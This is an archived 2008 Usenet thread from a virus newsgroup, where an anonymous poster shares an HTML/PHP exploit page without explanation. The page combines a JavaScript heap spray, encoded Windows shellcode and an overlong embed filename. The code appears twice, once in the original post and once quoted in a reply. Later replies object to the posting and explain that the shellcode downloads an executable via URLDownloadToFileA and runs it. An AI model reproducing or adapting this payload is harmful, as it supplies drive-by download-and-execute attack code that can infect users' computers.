neat script
in [Viruses]
|
From: George Orwell on 26 Sep 2008 12:47 <html> <head> <script> var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); do { s+=s; } while(s.length < 0x0900000); s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF<?=$ff_path;?>"); </script> </head> <body> <embed src="<? for($i=0; $i < 2038;$i++) echo "-"; ?>AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></embed> </body> </html> Il mittente di questo messaggio|The sender address of this non corrisponde ad un utente |message is not related to a real reale ma all'indirizzo fittizio|person but to a fake address of an di un sistema anonimizzatore |anonymous system Per maggiori informazioni |For more info https://www.mixmaster.it
From: David H. Lipman on 26 Sep 2008 16:51 From: "George Orwell" <nobody(a)mixmaster.it> Please do NOT post scripts. Please read the a.c.v FAQ http://www.faqs.org/faqs/computer-virus/posting-guidelines/ -- Dave http://www.claymania.com/removal-trojan-adware.html Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
From: Russg on 26 Sep 2008 19:41 I'm sure not going to try it. What does it do? "George Orwell" <nobody(a)mixmaster.it> wrote in message news:cf90f71504418ea40e37a4ea336310cf(a)mixmaster.it... > <html> > <head> > <script> > var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); > do { s+=s; } while(s.length < 0x0900000); > s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF<?=$ff_path;?>"); > </script> > </head> > <body> > <embed src="<? for($i=0; $i < 2038;$i++) echo "-"; > ?>AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></embed> > </body> > </html> > > Il mittente di questo messaggio|The sender address of this > non corrisponde ad un utente |message is not related to a real > reale ma all'indirizzo fittizio|person but to a fake address of an > di un sistema anonimizzatore |anonymous system > Per maggiori informazioni |For more info > https://www.mixmaster.it >
From: Ant on 26 Sep 2008 20:36 "Russg" wrote: > I'm sure not going to try it. What does it do? It's an exploit template with shellcode to download and run nasties on your Windows computer. It won't do anything as it stands because it's server-side code and reqires parameters. (Aside to Dave L -- I see Dennis beat me to it!)
From: David H. Lipman on 26 Sep 2008 21:35 From: "Ant" <not(a)home.today> | "Russg" wrote: >> I'm sure not going to try it. What does it do? | It's an exploit template with shellcode to download and run nasties | on your Windows computer. It won't do anything as it stands because | it's server-side code and reqires parameters. | (Aside to Dave L -- I see Dennis beat me to it!) Yeah but he posted the assembler code and only indicated it downloaded the file U.exe to c:\ using URLDownloadToFileA() but not much else and my assembly is rusty as hell. -- Dave http://www.claymania.com/removal-trojan-adware.html Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
|
Next
|
Last
Pages: 1 2 Prev: What best virus checker (to boot from CD) Next: GMER and aujasnkj.sys? |